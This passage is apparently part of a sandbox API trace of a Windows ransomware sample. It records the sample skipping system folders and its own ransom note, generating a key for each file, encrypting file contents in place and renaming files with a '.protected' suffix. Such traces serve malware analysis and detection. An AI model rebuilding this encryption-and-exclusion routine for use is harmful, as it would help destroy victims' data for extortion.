lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2d7, lpOverlapped=0x0) returned 1 [0088.052] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.052] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.053] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.053] CloseHandle (hObject=0x150) returned 1 [0088.053] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.protected") returned 161 [0088.053] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77.protected")) returned 1 [0088.054] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.054] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="Windows") returned -1 [0088.054] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="Program Files") returned -1 [0088.054] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="Program Files (x86)") returned -1 [0088.054] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="$Recycle.bin") returned 1 [0088.054] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="System Volume Information") returned -1 [0088.054] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned 151 [0088.054] StrStrIW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpSrch=".protected") returned 0x0 [0088.054] lstrcmpW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="RESTORE_FILES.txt") returned -1 [0088.054] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.054] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.055] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned 151 [0088.055] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpSrch=".txt") returned 0x0 [0088.055] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned 151 [0088.055] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpSrch=".rar") returned 0x0 [0088.055] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned 151 [0088.055] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpSrch=".zip") returned 0x0 [0088.055] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2d7, lpOverlapped=0x0) returned 1 [0088.167] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffd29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.167] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2d7, lpOverlapped=0x0) returned 1 [0088.167] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.167] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.167] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.167] CloseHandle (hObject=0x150) returned 1 [0088.168] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.protected") returned 161 [0088.168] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220.protected")) returned 1 [0088.169] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.169] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="Windows") returned -1 [0088.169] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="Program Files") returned -1 [0088.169] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="Program Files (x86)") returned -1 [0088.169] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="$Recycle.bin") returned 1 [0088.169] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="System Volume Information") returned -1 [0088.169] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned 151 [0088.169] StrStrIW (lpFirst="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpSrch=".protected") returned 0x0 [0088.169] lstrcmpW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="RESTORE_FILES.txt") returned -1 [0088.169] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.169] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.170] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned 151 [0088.170] StrStrW (lpFirst="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpSrch=".txt") returned 0x0 [0088.170] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned 151 [0088.170] StrStrW (lpFirst="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpSrch=".rar") returned 0x0 [0088.170] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned 151 [0088.170] StrStrW (lpFirst="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpSrch=".zip") returned 0x0 [0088.170] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0088.171] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.171] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d7, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0088.171] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.171] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.171] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.171] CloseHandle (hObject=0x150) returned 1 [0088.171] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.protected") returned 161 [0088.171] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4.protected")) returned 1 [0088.172] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.172] lstrcmpiW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="Windows") returned -1 [0088.172] lstrcmpiW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="Program Files") returned -1 [0088.172] lstrcmpiW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="Program Files (x86)") returned -1 [0088.172] lstrcmpiW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="$Recycle.bin") returned 1 [0088.172] lstrcmpiW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="System Volume Information") returned -1 [0088.172] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned 118 [0088.172] StrStrIW (lpFirst="696F3DE637E6DE85B458996D49D759AD", lpSrch=".protected") returned 0x0 [0088.172] lstrcmpW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="RESTORE_FILES.txt") returned -1 [0088.172] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.172] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.173] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned 118 [0088.173] StrStrW (lpFirst="696F3DE637E6DE85B458996D49D759AD", lpSrch=".txt") returned 0x0 [0088.173] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned 118 [0088.173] StrStrW (lpFirst="696F3DE637E6DE85B458996D49D759AD", lpSrch=".rar") returned 0x0 [0088.173] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned 118 [0088.173] StrStrW (lpFirst="696F3DE637E6DE85B458996D49D759AD", lpSrch=".zip") returned 0x0 [0088.173] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x32d, lpOverlapped=0x0) returned 1 [0088.174] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffcd3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.174] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x32d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x32d, lpOverlapped=0x0) returned 1 [0088.174] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.174] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.174] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.174] CloseHandle (hObject=0x150) returned 1 [0088.174] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD.protected") returned 128 [0088.175] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad.protected")) returned 1 [0088.175] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.175] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="Windows") returned -1 [0088.175] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="Program Files") returned -1 [0088.175] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="Program Files (x86)") returned -1 [0088.175] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="$Recycle.bin") returned 1 [0088.175] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="System Volume Information") returned -1 [0088.175] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned 151 [0088.175] StrStrIW (lpFirst="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpSrch=".protected") returned 0x0 [0088.176] lstrcmpW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="RESTORE_FILES.txt") returned -1 [0088.176] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.176] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned 151 [0088.176] StrStrW (lpFirst="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpSrch=".txt") returned 0x0 [0088.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned 151 [0088.176] StrStrW (lpFirst="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpSrch=".rar") returned 0x0 [0088.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned 151 [0088.176] StrStrW (lpFirst="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpSrch=".zip") returned 0x0 [0088.176] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x648, lpOverlapped=0x0) returned 1 [0088.226] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff9b8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.226] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x648, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x648, lpOverlapped=0x0) returned 1 [0088.227] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.227] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.227] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.227] CloseHandle (hObject=0x150) returned 1 [0088.227] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.protected") returned 161 [0088.227] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21.protected")) returned 1 [0088.228] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.228] lstrcmpiW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="Windows") returned -1 [0088.228] lstrcmpiW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="Program Files") returned -1 [0088.228] lstrcmpiW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="Program Files (x86)") returned -1 